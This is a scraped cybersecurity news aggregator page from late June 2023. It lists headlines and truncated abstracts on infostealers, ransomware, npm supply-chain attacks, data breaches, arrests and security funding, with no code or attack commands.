A previously undocumented Windows-based information stealer called ThirdEye has been discovered in the wild with capabilities to harvest sensitive data from infected hosts. Fortinet FortiGuard Labs, which made the discovery , said it found the malware in an executable that masqueraded as a PDF file with a Russian name "CMK Правила оформления больничных листов.pdf.exe," which translates to "CMK Rules for issuing sick leaves.pdf.exe." The arrival vector for the malware is presently unknown, although the nature of the lure points to it being used in a phishing campaign. The very first ThirdEye sample was uploaded to VirusTotal on April 4, 2023, with relatively fewer features. The evolving stealer, like other malware families of its kind, is equipped to gather system metadata, including BIOS release date and vendor, total/free disk space on the C drive, currently running processes, register usernames, and volume information. The amassed details are then traThe Hacker News
June 29, 2023 – Criminals
Security analyst wanted by both Russia and the US Full Text
Abstract
A Russian network security specialist and former editor of Hacker magazine who is wanted by the US and Russia on cybercrime charges has been detained in Kazakhstan as the two governments seek his extradition.Cyware
June 29, 2023 – Breach
US Patent and Trademark Office Notifies Filers of Years-Long Data Leak Full Text
Abstract
The U.S. Patent and Trademark Office (USPTO) said in a notice sent to affected trademark applicants that their private domicile address — often their home address — inadvertently appeared in public records between February 2020 and March 2023.Cyware
June 28, 2023 – Solution
Microsoft Sysmon now detects when executables files are created Full Text
Abstract
Microsoft has released Sysmon 15, converting it into a protected process and adding the new 'FileExecutableDetected' option to log when executable files are created.BleepingComputer
June 28, 2023 – Malware
Infectious NPM and PyPI Packages Raise Fresh Supply Chain Concerns Full Text
Abstract
Security researchers have laid bare an ongoing attack campaign that specifically targets the npm ecosystem via a pair of malicious packages. Meanwhile, another researcher group reported seven malicious PyPI packages. Developers, package maintainers, and users must remain diligent in verifying the i ... Read MoreCyware
June 28, 2023 – Vulnerabilities
Alert: New Electromagnetic Attacks on Drones Could Let Attackers Take Control Full Text
Abstract
Drones that don't have any known security weaknesses could be the target of electromagnetic fault injection (EMFI) attacks, potentially enabling a threat actor to achieve arbitrary code execution and compromise their functionality and safety. The research comes from IOActive, which found that it is "feasible to compromise the targeted device by injecting a specific EM glitch at the right time during a firmware update." "This would allow an attacker to gain code execution on the main processor, gaining access to the Android OS that implements the core functionality of the drone," Gabriel Gonzalez, director of hardware security at the company, said in a report published this month. The study , which was undertaken to determine the current security posture of Unmanned Aerial Vehicles (UAVs), was carried out on Mavic Pro , a popular quadcopter drone manufactured by DJI that employs various security features like signed and encrypted firmware, Trusted ExecutiThe Hacker News
June 28, 2023 – Attack
Using Electromagnetic Fault Injection Attacks to take over drones Full Text
Abstract
Electromagnetic fault injection (EMFI) attacks on drones can potentially allow attackers to achieve arbitrary code execution and take over them. While the use of drones continues to grow, researchers from IOActive analyzed how to develop fault injection...Security Affairs
June 28, 2023 – Vulnerabilities
Exploit released for new Arcserve UDP auth bypass vulnerability Full Text
Abstract
Data protection vendor Arcserve has addressed a high-severity security flaw in its Unified Data Protection (UDP) backup software that can let attackers bypass authentication and gain admin privileges.BleepingComputer
June 28, 2023 – Vulnerabilities
Numerous Devices Discovered Violating CISA’s BOD Full Text
Abstract
Censys has recently analyzed the attack surfaces of over 50 FCEB organizations and detected several hundred devices to be publicly exposed to a variety of cybersecurity threats. They are not secured according to CISA’s latest Binding Operational Directive (BOD). Moreover, software programs suc ... Read MoreCyware
June 28, 2023 – Criminals
CryptosLabs Scam Ring Targets French-Speaking Investors, Rakes in €480 Million Full Text
Abstract
Cybersecurity researchers have exposed the workings of a scam ring called CryptosLabs that's estimated to have made €480 million in illegal profits by targeting users in French-speaking individuals in France, Belgium, and Luxembourg since April 2018. The syndicate's massive fake investment schemes primarily involve impersonating 40 well-known banks, fin-techs, asset management firms, and crypto platforms, setting up a scam infrastructure spanning over 350 domains hosted on more than 80 servers, Group-IB said in a deep-dive report. The Singapore-headquartered company described the criminal outfit as "operated by a hierarchy of kingpins, sales agents, developers, and call center operators" who are recruited to ensnare potential victims by promising high returns on their capital. "CryptoLabs made their scam schemes more convincing through region-focused tactics, such as hiring French-speaking callers as 'managers' and creating fake landing pages, sociaThe Hacker News
June 28, 2023 – General
Experts warn of a spike in May and June of 8Base ransomware attacks Full Text
Abstract
Researchers warn of a massive spike in May and June 2023 of the activity associated with the ransomware group named 8Base. VMware Carbon Black researchers observed an intensification of the activity associated with a stealthy ransomware group named 8Base....Security Affairs
June 28, 2023 – Ransomware
– Ransomware
Linux version of Akira ransomware targets VMware ESXi servers Full Text
Abstract
The Akira ransomware operation uses a Linux encryptor to encrypt VMware ESXi virtual machines in double-extortion attacks against companies worldwide.BleepingComputer
June 28, 2023 – Business
Astrix Security, which uses ML to secure app integrations, raises $25M Full Text
Abstract
Astrix Security, a platform that helps companies manage and secure third-party app integrations, today announced that it closed a $25 million Series A funding round led by CRV with participation from Bessemer Venture Partners and F2 Venture Capital.Cyware
June 28, 2023 – Education
5 Things CISOs Need to Know About Securing OT Environments Full Text
Abstract
For too long the cybersecurity world focused exclusively on information technology (IT), leaving operational technology (OT) to fend for itself. Traditionally, few industrial enterprises had dedicated cybersecurity leaders. Any security decisions that arose fell to the plant and factory managers, who are highly skilled technical experts in other areas but often lack cybersecurity training or knowledge. In more recent years, an uptick in cyberattacks against industrial facilities and the trend of IT/OT convergence driven by Industry 4.0 have highlighted the vacuum of ownership around OT security. According to a new Fortinet report , most organizations are looking to Chief Information Security Officers (CISOs) to solve the problem. Fortunately, CISOs are no strangers to change or difficult challenges. The position itself is less than 20 years old, yet in those two decades CISOs have navigated some of the most disruptive cybersecurity events that were truly watershed moments in technoThe Hacker News
June 28, 2023 – Vulnerabilities
Critical SQL Injection flaws in Gentoo Soko can lead to Remote Code Execution Full Text
Abstract
SQL injection vulnerabilities in Gentoo Soko could lead to remote code execution (RCE) on impacted systems. SonarSource researchers discovered two SQL injection vulnerabilities in Gentoo Soko, collectively tracked as CVE-2023-28424 (CVSS score: 9.1)...Security Affairs
June 28, 2023 – Solution
Brave Browser boosts privacy with new local resources restrictions Full Text
Abstract
The Brave team has announced that the privacy-centric browser will soon introduce new restriction controls allowing users to specify how long sites can access local network resources.BleepingComputer
June 28, 2023 – Vulnerabilities
NPM Registry Found to be Vulnerable to ‘Manifest Confusion’ Abuse Full Text
Abstract
The npm Public Registry, a database of JavaScript packages, fails to compare npm package manifest data with the archive of files that data describes, creating an opportunity for the installation and execution of malicious files.Cyware
June 28, 2023 – Ransomware
8Base Ransomware Spikes in Activity, Threatens U.S. and Brazilian Businesses Full Text
Abstract
A ransomware threat called 8Base that has been operating under the radar for over a year has been attributed to a "massive spike in activity" in May and June 2023. "The group utilizes encryption paired with 'name-and-shame' techniques to compel their victims to pay their ransoms," VMware Carbon Black researchers Deborah Snyder and Fae Carlisle said in a report shared with The Hacker News. "8Base has an opportunistic pattern of compromise with recent victims spanning across varied industries." 8Base, according to statistics gathered by Malwarebytes and NCC Group , has been linked to 67 attacks as of May 2023, with about 50% of the victims operating in the business services, manufacturing, and construction sectors. A majority of the targeted companies are located in the U.S. and Brazil. With very little known about the operators of the ransomware, its origins remain something of a cipher. What's evident is that it has been active sincThe Hacker News
June 28, 2023 – Criminals
EncroChat dismantling led to 6,558 arrests and the seizure of $979M in criminal funds Full Text
Abstract
Europol announced that the takedown of the EncroChat encrypted chat network has led to the arrest of 6,558 people and the seizure of $979 million in illicit funds. Europol announced that the dismantling of the encrypted chat network EncroChat has led to the arrest...Security Affairs
June 28, 2023 – Vulnerabilities
NPM ecosystem at risk from “Manifest Confusion” attacks Full Text
Abstract
The NPM (Node Package Manager) registry suffers from a security lapse called "manifest confusion," which undermines the trustworthiness of packages and makes it possible for attackers to hide malware in dependencies or perform malicious script execution during installation.BleepingComputer
June 28, 2023 – Phishing
Ukraine Cracks Down on Investment Scams, Raids Call Centers Full Text
Abstract
Ukrainian cyber police raided and closed over a dozen fraudulent call centers last week, saying the operations were running fake investment scams that involved stealing cryptocurrency and payment card details from European and Central Asian citizens.Cyware
June 28, 2023 – Vulnerabilities
Critical SQL Injection Flaws Expose Gentoo Soko to Remote Code Execution Full Text
Abstract
Multiple SQL injection vulnerabilities have been disclosed in Gentoo Soko that could lead to remote code execution (RCE) on vulnerable systems. "These SQL injections happened despite the use of an Object-Relational Mapping (ORM) library and prepared statements," SonarSource researcher Thomas Chauchefoin said , adding they could result in RCE on Soko because of a "misconfiguration of the database." The two issues , which were discovered in the search feature of Soko, have been collectively tracked as CVE-2023-28424 (CVSS score: 9.1). They were addressed within 24 hours of responsible disclosure on March 17, 2023. Soko is a Go software module that powers packages.gentoo.org , offering users an easy way to search through different Portage packages that are available for Gentoo Linux distribution. But the shortcomings identified in the service meant that it could have been possible for a malicious actor to inject specially crafted code , resulting in the expoThe Hacker News
June 28, 2023 – General
The Current State of Business Email Compromise Attacks Full Text
Abstract
Business Email Compromise (BEC) poses a growing threat to businesses of all sizes. Learn more from Specops Software about the types of BEC attacks and how to avoid them.BleepingComputer
June 28, 2023 – Breach
Victim Count in Ransomware Attack at Maryland Healthcare Provider Jumps Fivefold to 137,000 Full Text
Abstract
A Berlin, Maryland-based hospital recently told regulators that a ransomware breach discovered in January had compromised the sensitive information of nearly 137,000 patients, about five times the number of people originally estimated to be affected.Cyware
June 28, 2023 – Criminals
8Base ransomware gang escalates double extortion attacks in June Full Text
Abstract
A 8Base ransomware gang is targeting organizations worldwide in double-extortion attacks, with a steady stream of new victims since the beginning of June.BleepingComputer
June 28, 2023 – Business
Cyera Raises $100M to Bring Data Protection to Hybrid Cloud Full Text
Abstract
The startup, founded by longtime Israeli Military Intelligence leaders, landed the Accel-led $100 million Series B funding to support the cloud and on-premises data protection needs of hybrid organizations.Cyware
June 28, 2023 – Policy and Law
SolarWinds says SEC investigation ‘progressing to charges’ Full Text
Abstract
SolarWinds — the technology firm at the center of a December 2020 hack that affected multiple U.S. government agencies — said its executives may soon face charges from the Securities and Exchange Commission (SEC) for its response to the incident.Cyware
June 28, 2023 – Government
UAE, Israel create ‘Crystal Ball’ platform to fight hackers Full Text
Abstract
The mission is to “design, deploy and enable regional intelligence enhancement” through collaboration and knowledge-sharing to combat national-level cyberthreats, according to a presentation by Mohamed Al Kuwaiti, UAE head of cybersecurity.Cyware
June 27, 2023 – Breach
Siemens Energy confirms data breach after MOVEit data-theft attack Full Text
Abstract
Siemens Energy has confirmed that data was stolen during the recent Clop ransomware data-theft attacks using a zero-day vulnerability in the MOVEit Transfer platform.BleepingComputer
June 27, 2023 – Policy and Law
Hundreds of devices found violating new CISA federal agency directive Full Text
Abstract
Censys researchers have discovered hundreds of Internet-exposed devices on the networks of U.S. federal agencies that have to be secured according to a recently issued CISA Binding Operational Directive.BleepingComputer
June 27, 2023 – Criminals
EncroChat takedown led to 6,500 arrests and $979 million seized Full Text
Abstract
Europol announced today that the takedown of the EncroChat encrypted mobile communications platform has led to the arrest of over 6,600 people and the seizure of $979 million in illicit funds.BleepingComputer
June 27, 2023 – General
Just released: Session tracks for Mandiant’s 2023 mWISE event Full Text
Abstract
There are just a few days left to get the lowest price available for the mWISE cybersecurity conference. It runs from September 18 - 20, 2023 in Washington, DC. If you register now, you'll get 45% off the standard conference rate.BleepingComputer
June 27, 2023 – Malware
New Mockingjay process injection technique evades EDR detection Full Text
Abstract
A new process injection technique named 'Mockingjay' could allow threat actors to bypass EDR (Endpoint Detection and Response) and other security products to stealthily execute malicious code on compromised systems.BleepingComputer
June 27, 2023 – Malware
Hackers Steal Messages, Call Logs, and Locations Intercepted by Phone Monitoring App Full Text
Abstract
The phone monitoring app, which is used to spy on thousands of people using Android phones, said in a notice on its login page that on June 21, “a security incident occurred involving obtaining unauthorized access to the data of website users??.”Cyware
June 27, 2023 – Malware
New Mockingjay Process Injection Technique Could Let Malware Evade Detection Full Text
Abstract
A new process injection technique dubbed Mockingjay could be exploited by threat actors to bypass security solutions to execute malicious code on compromised systems. "The injection is executed without space allocation, setting permissions or even starting a thread," Security Joes researchers Thiago Peixoto, Felipe Duarte, and Ido Naor said in a report shared with The Hacker News. "The uniqueness of this technique is that it requires a vulnerable DLL and copying code to the right section." Process injection is an attack method that allows adversaries to inject code into processes in order to evade process-based defenses and elevate privileges. In doing so, it could allow for the execution of arbitrary code in the memory space of a separate live process. Some of the well-known process injection techniques include dynamic link library (DLL) injection, portable executable injection, thread execution hijacking, process hollowing, and process doppelgänging, amonThe Hacker News
June 27, 2023 – Malware
Mockingjay process injection technique allows EDR bypass Full Text
Abstract
Mockingjay is a new process injection technique that can be exploited to bypass security solutions to execute malware on compromised systems. A new process injection technique dubbed Mockingjay can be exploited by attackers to bypass security controls...Security Affairs
June 27, 2023 – Vulnerabilities
Experts found hundreds of devices within federal networks having internet-exposed management interfaces Full Text
Abstract
Researchers at Censys have analyzed the attack surfaces of more than 50 Federal Civilian Executive Branch (FCEB) organizations and sub-organizations and discovered more than 13,000 distinct hosts across 100 autonomous systems.Cyware
June 27, 2023 – Attack
New Ongoing Campaign Targets npm Ecosystem with Unique Execution Chain Full Text
Abstract
Cybersecurity researchers have discovered a new ongoing campaign aimed at the npm ecosystem that leverages a unique execution chain to deliver an unknown payload to targeted systems. "The packages in question seem to be published in pairs, each pair working in unison to fetch additional resources which are subsequently decoded and/or executed," software supply chain security firm Phylum said in a report released last week. To that end, the order in which the pair of packages are installed is paramount to pulling off a successful attack, as the first of the two modules are designed to store locally a token retrieved from a remote server. The campaign was first discovered on June 11, 2023. The second package subsequently passes this token as a parameter alongside the operating system type to an HTTP GET request to acquire a second script from the remote server. A successful execution returns a Base64-encoded string that is immediately executed but only if that string isThe Hacker News
June 27, 2023 – Government
Experts found hundreds of devices within federal networks having internet-exposed management interfaces Full Text
Abstract
Researchers at Censys have identified hundreds of devices deployed within federal networks that have internet-exposed management interfaces. Researchers at Censys have analyzed the attack surfaces of more than 50 Federal Civilian Executive Branch...Security Affairs
June 27, 2023 – Attack
Senior Choice, Inc. Provides Notice of Security Incident Full Text
Abstract
The company, which manages three residential facilities in Pennsylvania, discovered suspicious activity in its internal systems used for business operations and immediately implemented measures to contain the situation.Cyware
June 27, 2023 – Solution
Beyond Asset Discovery: How Attack Surface Management Prioritizes Vulnerability Remediation Full Text
Abstract
As the business environment becomes increasingly connected, organizations' attack surfaces continue to expand, making it challenging to map and secure both known and unknown assets. In particular, unknown assets present security challenges related to shadow IT, misconfigurations, ineffective scan coverage, among others. Given attack surface sprawl and evolving threats, many organizations are embracing attack surface management (ASM) tools to discover and address critical exposures. Asset discovery is an important capability to have, and one that's helping to drive the adoption of attack surface management tools and services. That said, asset discovery is only one aspect of effective attack surface management. Making the attack surface as impenetrable as possible takes offensive security that goes far beyond the discovery phase. Why Asset Discovery Isn't Enough Given the complexity and ever-expanding scale of the digital infrastructure at most companies, cataloging all the knownThe Hacker News
June 27, 2023 – Attack
Schneider Electric and Siemens Energy are two more victims of a MOVEit attack Full Text
Abstract
Clop ransomware group added five new victims of MOVEit attacks to its dark web leak site, including Schneider Electric and Siemens Energy. The Clop ransomware group added five new victims of MOVEit attacks to its dark web leak site, including the industrial...Security Affairs
June 27, 2023 – Business
Socure Buys Berbix for $70M to Fortify Identity Verification Full Text
Abstract
The Nevada-based identity verification company said the acquisition of San Francisco-based Berbix will help it optimize the digital capturing and back-end processing of driver's licenses and passports at faster speeds and with greater accuracy.Cyware
June 27, 2023 – Criminals
EncroChat Bust Leads to 6,558 Criminals’ Arrests and €900 Million Seizure Full Text
Abstract
Europol on Tuesday announced that the takedown of EncroChat in July 2020 led to 6,558 arrests worldwide and the seizure of €900 million in illicit criminal proceeds. The law enforcement agency said that a subsequent joint investigation initiated by French and Dutch authorities intercepted and analyzed over 115 million conversations that took place over the encrypted messaging platform between no less than 60,000 users. Now almost three years later, the information obtained from digital correspondence has resulted in - Arrests of 6,558 suspects, including 197 high-value targets 7,134 years of imprisonment of convicted criminals Confiscation of €739.7 million in cash Freeze of €154.1 million frozen in assets or bank accounts Seizure of 30.5 million pills of chemical drugs Seizure of 103.5 tonnes of cocaine, 163.4 tonnes of cannabis, and 3.3 tonnes of heroin Seizure of 971 vehicles, 83 boats, and 40 planes Seizure of 271 estates or homes, and Seizure of 923 weapons, as wellThe Hacker News
June 27, 2023 – Cryptocurrency
JOKERSPY used to target a cryptocurrency exchange in Japan Full Text
Abstract
An unnamed Japanese cryptocurrency exchange was the victim of a cyber attack aimed at deploying an Apple macOS backdoor named JokerSpy. Elastic Security Labs researchers provided details about a recently discovered intrusion at an unnamed cryptocurrency...Security Affairs
June 27, 2023 – Breach
Schneider Electric and Siemens Energy Among the Latest Victims of MOVEit Zero-Day Attacks Full Text
Abstract
The Cl0p ransomware group added five new victims of MOVEit attacks to its dark web leak site, including the industrial control systems giants Schneider Electric and Siemens Energy.Cyware
June 27, 2023 – Malware
Anatsa Banking Trojan Targeting Users in US, UK, Germany, Austria, and Switzerland Full Text
Abstract
A new Android malware campaign has been observed pushing the Anatsa banking trojan to target banking customers in the U.S., U.K., Germany, Austria, and Switzerland since the start of March 2023. "The actors behind Anatsa aim to steal credentials used to authorize customers in mobile banking applications and perform Device-Takeover Fraud (DTO) to initiate fraudulent transactions," ThreatFabric said in an analysis published Monday. The Dutch cybersecurity company said Anatsa-infected Google Play Store dropper apps have accrued over 30,000 installations to date, indicating that the official app storefront has become an effective distribution vector for the malware. Anatsa, also known by the name TeaBot and Toddler, first emerged in early 2021 , and has been observed masquerading as seemingly innocuous utility apps like PDF readers, QR code scanners, and two-factor authentication (2FA) apps on Google Play to siphon users' credentials. It has since become one oThe Hacker News
June 27, 2023 – Business
CalypsoAI Raises $23 Million for AI Security Tech Full Text
Abstract
The company, founded by DARPA, NASA, and DoD veterans, said the Series A-1 financing was led by Paladin Capital Group. Existing investors including Lockheed Martin Ventures, new investors Hakluyt Capital and Expeditions Fund, also took part.Cyware
June 27, 2023 – Vulnerabilities
New Fortinet’s FortiNAC Vulnerability Exposes Networks to Code Execution Attacks Full Text
Abstract
Fortinet has rolled out updates to address a critical security vulnerability impacting its FortiNAC network access control solution that could lead to the execution of arbitrary code. Tracked as CVE-2023-33299 , the flaw is rated 9.6 out of 10 for severity on the CVSS scoring system. It has been described as a case of Java untrusted object deserialization. "A deserialization of untrusted data vulnerability [ CWE-502 ] in FortiNAC may allow an unauthenticated user to execute unauthorized code or commands via specifically crafted requests to the tcp/1050 service," Fortinet said in an advisory published last week. The shortcoming impacts the following products, with patches available in FortiNAC versions 7.2.2, 9.1.10, 9.2.8, and 9.4.3 or later - FortiNAC version 9.4.0 through 9.4.2 FortiNAC version 9.2.0 through 9.2.7 FortiNAC version 9.1.0 through 9.1.9 FortiNAC version 7.2.0 through 7.2.1 FortiNAC 8.8 all versions FortiNAC 8.7 all versions FortiNAC 8.6 all vThe Hacker News
June 27, 2023 – Vulnerabilities
Chrome 114 Update Patches High-Severity Vulnerabilities Full Text
Abstract
Google this week announced a new Chrome 114 update that patches a total of four vulnerabilities, including three high-severity bugs reported by external security researchers.Cyware
June 27, 2023 – Hacker
The potent cyber adversary threatening to further inflame Iranian politics Full Text
Abstract
The latest hack claimed by GhyamSarnegouni demonstrates the depth of information that hackers and hacktivists are accessing in Iran's internal politics, with potentially significant implications for national security.Cyware
June 26, 2023 – Outage
Sweetwater Union High School District confirms data breach caused outages in February Full Text
Abstract
The district says their investigation determined in mid-May that some personal information from current and former employees, their dependents, students, and families, was potentially accessed by attackers from the district's network.Cyware
June 26, 2023 – Education
Researchers Find Way to Recover Cryptographic Keys by Analyzing LED Flickers Full Text
Abstract
In what's an ingenious side-channel attack , a group of academics has found that it's possible to recover secret keys from a device by analyzing video footage of its power LED. "Cryptographic computations performed by the CPU change the power consumption of the device which affects the brightness of the device's power LED," researchers from the Ben-Gurion University of the Negev and Cornell University said in a study. By taking advantage of this observation, it's possible for threat actors to leverage video camera devices such as an iPhone 13 or an internet-connected surveillance camera to extract the cryptographic keys from a smart card reader. Specifically, video-based cryptanalysis is accomplished by obtaining video footage of rapid changes in an LED's brightness and exploiting the video camera's rolling shutter effect to capture the physical emanations. "This is caused by the fact that the power LED is connected directly to the powThe Hacker News
June 26, 2023 – Policy and Law
Citizen of Croatia charged with running the Monopoly Market drug marketplace Full Text
Abstract
Milomir Desnica, a citizen of Croatia and Serbia, has been charged with running the Monopoly Market drug darknet marketplace. Milomir Desnica (33), a citizen of Croatia and Serbia, has been extradited from Austria to the United States to face charges...Security Affairs
June 26, 2023 – Breach
MOVEit Breach Exposes Sensitive Data on New York City Public Schools Full Text
Abstract
A MOVEit cyberattack has exposed sensitive data on around 45 thousand New York City Public School students - as well as Department of Education staff and service providers.Cyware
June 26, 2023 – Attack
Japanese Cryptocurrency Exchange Falls Victim to JokerSpy macOS Backdoor Attack Full Text
Abstract
An unknown cryptocurrency exchange located in Japan was the target of a new attack earlier this month to deploy an Apple macOS backdoor called JokerSpy. Elastic Security Labs, which is monitoring the intrusion set under the name REF9134 , said the attack led to the installation of Swiftbelt, a Swift-based enumeration tool inspired by an open-source utility called SeatBelt . JokerSky was first documented by Bitdefender last week, describing it as a sophisticated toolkit designed to breach macOS machines. Very little is known about the threat actor behind the operation other than the fact that the attacks leverage a set of programs written in Python and Swift that come with capabilities to gather data and execute arbitrary commands on compromised hosts. A primary component of the toolkit is a self-signed multi-architecture binary known as xcc that's engineered to check for FullDiskAccess and ScreenRecording permissions. The file is signed as XProtectCheck, indicating anThe Hacker News
June 26, 2023 – Attack
Energy company Suncor suffered a cyber attack and its company Petro-Canada gas reported problems at its gas stations in Canada Full Text
Abstract
The cyber attack suffered by Suncor Energy impacted payment operations at Petro-Canada gas stations in Canada. Suncor Energy is Canada's leading integrated energy company that provides oil sands development, production and upgrading, offshore oil and gas,...Security Affairs
June 26, 2023 – Criminals
Cybercriminals target high-profit companies: AEI Full Text
Abstract
Cybercriminals tend to strike highly profitable companies, those holding abundant cash, and organizations that spend generously on advertising, according to an American Enterprise Institute study of cyberattacks from January 1999 until January 2022.Cyware
June 26, 2023 – Education
How Generative AI Can Dupe SaaS Authentication Protocols — And Effective Ways To Prevent Other Key AI Risks in SaaS Full Text
Abstract
Security and IT teams are routinely forced to adopt software before fully understanding the security risks. And AI tools are no exception. Employees and business leaders alike are flocking to generative AI software and similar programs, often unaware of the major SaaS security vulnerabilities they're introducing into the enterprise. A February 2023 generative AI survey of 1,000 executives revealed that 49% of respondents use ChatGPT now, and 30% plan to tap into the ubiquitous generative AI tool soon. Ninety-nine percent of those using ChatGPT claimed some form of cost-savings, and 25% attested to reducing expenses by $75,000 or more. As the researchers conducted this survey a mere three months after ChatGPT's general availability, today's ChatGPT and AI tool usage is undoubtedly higher. Security and risk teams are already overwhelmed protecting their SaaS estate (which has now become the operating system of business) from common vulnerabilities such as misconfiguratiThe Hacker News
June 26, 2023 – Vulnerabilities
Internet Systems Consortium (ISC) fixed three DoS flaw in BIND Full Text
Abstract
The Internet Systems Consortium (ISC) addressed three denial-of-service (DoS) vulnerabilities in the DNS software suite BIND. The Internet Systems Consortium (ISC) released security updates to address three denial-of-service (DoS) vulnerabilities...Security Affairs
June 26, 2023 – Botnet
Mirai Variant Targets Multiple IoT Vulnerabilities in Recent Campaign Full Text
Abstract
Unit 42 researchers uncovered a modified version of the Mirai botnet that is actively abusing at least 22 security flaws in devices manufactured by the likes of D-Link, Arris, Zyxel, TP-Link, Tenda, Netgear, and MediaTek. The attackers aim to take control of these devices and utilize them to carry ... Read MoreCyware
June 26, 2023 – Attack
Microsoft Warns of Widescale Credential Stealing Attacks by Russian Hackers Full Text
Abstract
Microsoft has disclosed that it's detected a spike in credential-stealing attacks conducted by the Russian state-affiliated hacker group known as Midnight Blizzard. The intrusions, which made use of residential proxy services to obfuscate the source IP address of the attacks, target governments, IT service providers, NGOs, defense, and critical manufacturing sectors, the tech giant's threat intelligence team said. Midnight Blizzard, formerly known as Nobelium , is also tracked under the monikers APT29, Cozy Bear, Iron Hemlock, and The Dukes. The group , which drew worldwide attention for the SolarWinds supply chain compromise in December 2020, has continued to rely on unseen tooling in its targeted attacks aimed at foreign ministries and diplomatic entities. It's a sign of how determined they are to keep their operations up and running despite being exposed, which makes them a particularly formidable actor in the espionage area. "These credential attacks usThe Hacker News
June 26, 2023
China-linked APT group VANGUARD PANDA uses a new tradecraft in recent attacks Full Text
Abstract
China-linked APT group VANGUARD PANDA, aka Volt Typhoon, was spotted observing a novel tradecraft to gain initial access to target networks. CrowdStrike researchers observed the China-linked APT group VANGUARD PANDA, aka Volt Typhoon, using a novel...Security Affairs
June 26, 2023 – Outage
Activision Blizzard Games Crippled by Hours-Long DDoS Attack Full Text
Abstract
The attack lasted for more than 10 hours and was mitigated late on Sunday, according to Activision Blizzard’s statement on Twitter. Blizzard has not yet identified the hacker group behind it and no one has yet come forward to claim responsibility.Cyware
June 26, 2023 – Hacker
Chinese Hackers Using Never-Before-Seen Tactics for Critical Infrastructure Attacks Full Text
Abstract
The newly discovered Chinese nation-state actor known as Volt Typhoon has been observed to be active in the wild since at least mid-2020, with the hacking crew linked to never-before-seen tradecraft to retain remote access to targets of interest. The findings come from CrowdStrike, which is tracking the adversary under the name Vanguard Panda . "The adversary consistently employed ManageEngine Self-service Plus exploits to gain initial access, followed by custom web shells for persistent access, and living-off-the-land (LotL) techniques for lateral movement," the cybersecurity company said . Volt Typhoon, as known as Bronze Silhouette, is a cyber espionage group from China that's been linked to network intrusion operations against the U.S government, defense, and other critical infrastructure organizations. An analysis of the group's modus operandi has revealed its emphasis on operational security, carefully using an extensive set of open-source tools againstThe Hacker News
June 26, 2023 – Ransomware
An Overview of the Different Versions of the Trigona Ransomware Full Text
Abstract
Trigona ransomware is a relatively new family that targets compromised MSSQL servers and has been detected mainly in the technology and healthcare industries in countries such as the US, India, and Israel.Cyware
June 26, 2023 – General
Congress needs ‘private sector buy-in’ to address cyber workforce shortage Full Text
Abstract
Organizations are working to educate and train the next generation of professionals to fill critical cybersecurity vacancies, but private sector firms need to change their hiring practices to integrate this pool of talent into the workforce.Cyware
June 26, 2023 – Malware
Trojanized Super Mario Bros game spreads malware Full Text
Abstract
Researchers observed threat actors spreading a trojanized Super Mario Bros game installer to deliver multiple malware. Researchers from Cyble Research and Intelligence Labs (CRIL) discovered a trojanized Super Mario Bros game installer for Windows...Security Affairs
June 25, 2023 – Policy and Law
Twitter hacker sentenced to five years in prison for cybercrime offenses Full Text
Abstract
A U.K. citizen, who was involved in the attack on Twitter in 2020, was sentenced to five years in prison for cybercrime offenses. Joseph James O'Connor, aka PlugwalkJoe (24), the hacker who was involved in the attacks on Twitter in 2020, was sentenced...Security Affairs
June 25, 2023 – General
Security Affairs newsletter Round 425 by Pierluigi Paganini – International edition Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Someone...Security Affairs
June 24, 2023 – Vulnerabilities
US Military Personnel Targeted by Unsolicited Smartwatches Linked to Data Breaches Full Text
Abstract
Recent reports indicate that these seemingly innocuous devices, once activated, automatically connect to Wi-Fi networks and establish unauthorized connections with users’ cell phones, potentially exposing sensitive personal data.Cyware
June 24, 2023 – Government
U.S. Cybersecurity Agency Adds 6 Flaws to Known Exploited Vulnerabilities Catalog Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency has added a batch of six flaws to its Known Exploited Vulnerabilities ( KEV ) catalog, citing evidence of active exploitation. This comprises three vulnerabilities that Apple patched this week ( CVE-2023-32434, CVE-2023-32435, and CVE-2023-32439 ), two flaws in VMware ( CVE-2023-20867 and CVE-2023-20887 ), and one shortcoming impacting Zyxel devices ( CVE-2023-27992 ). CVE-2023-32434 and CVE-2023-32435, both of which allow code execution, are said to have been exploited as zero-days to deploy spyware as part of a years-long cyber espionage campaign that commenced in 2019. Dubbed Operation Triangulation, the activity culminates in the deployment of TriangleDB that's designed to harvest a wide range of information from compromised devices, such as creating, modifying, removing, and stealing files, listing and terminating processes, gathering credentials from iCloud Keychain, and tracking a user's location. TheThe Hacker News
June 24, 2023 – Botnet
Researcher Identifies Popular Swing VPN Android App as DDoS Botnet Full Text
Abstract
Swing VPN is a legitimate VPN app developed for Android and iOS systems by Limestone Software Solutions. However, according to researcher Lecromee, the Android version of this app is a DDoS botnet and allegedly harbors malicious intent.Cyware
June 24, 2023 – Criminals
Twitter Hacker Sentenced to 5 Years in Prison for $120,000 Crypto Scam Full Text
Abstract
A U.K. citizen who took part in the massive July 2020 hack of Twitter has been sentenced to five years in prison in the U.S. Joseph James O'Connor (aka PlugwalkJoe), 24, was awarded the sentence on Friday in the Southern District of New York, a little over a month after he pleaded guilty to the criminal schemes. He was arrested in Spain in July 2021. The infamous Twitter breach allowed the defendant and his co-conspirators to obtain unauthorized access to backend tools used by Twitter, abusing them to hijack 130 popular accounts to perpetrate a crypto scam that netted them about $120,000 in illegal profits. "In other instances, the co-conspirators sold access to Twitter accounts to others," the U.S. Department of Justice (DoJ) said . "O'Connor communicated with others regarding purchasing unauthorized access to a variety of Twitter accounts, including accounts associated with public figures around the world." The defendant has also been accused oThe Hacker News
June 24, 2023 – Government
Someone is sending mysterious smartwatches to the US Military personnel Full Text
Abstract
U.S. Army’s Criminal Investigation Division warns that US military personnel have reported receiving unsolicited smartwatches in the mail. The U.S. Army’s Criminal Investigation Division reported that service members across the military received...Security Affairs
June 23, 2023 – Breach
2.5 million Genworth policyholders affected by MOVEit hack Full Text
Abstract
A third-party vendor lost the personal data of at least 2.5 million Genworth Financial policyholders, including Social Security numbers, to the Russian Cl0p ransomware gang, according to the Fortune 500 insurer.Cyware
June 23, 2023 – Criminals
Cybercrime Group ‘Muddled Libra’ Targets BPO Sector with Advanced Social Engineering Full Text
Abstract
